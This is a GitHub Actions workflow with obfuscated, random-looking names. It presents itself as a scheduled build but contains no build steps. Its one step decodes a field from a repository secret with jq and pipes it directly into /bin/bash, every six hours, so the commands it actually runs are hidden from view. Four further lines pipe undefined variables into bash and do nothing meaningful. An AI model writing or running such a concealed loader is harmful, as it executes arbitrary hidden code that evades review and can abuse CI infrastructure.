name: yuehongdong1278

on:
  workflow_dispatch:
  schedule:
    - cron: '44 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuehongdong1278
        env:
          jtqp521: ${{ secrets.jtqp521 }}
        run: |
          echo $jtqp521 | jq -r .loflh350 | /bin/bash
          echo $y9443 | jq -r .vezz36 | /bin/bash
          echo $txkk834 | jq -r .erj485 | /bin/bash
          echo $vcpr543 | jq -r .ew12566 | /bin/bash
          echo $vyw920 | jq -r .izrs9104 | /bin/bash

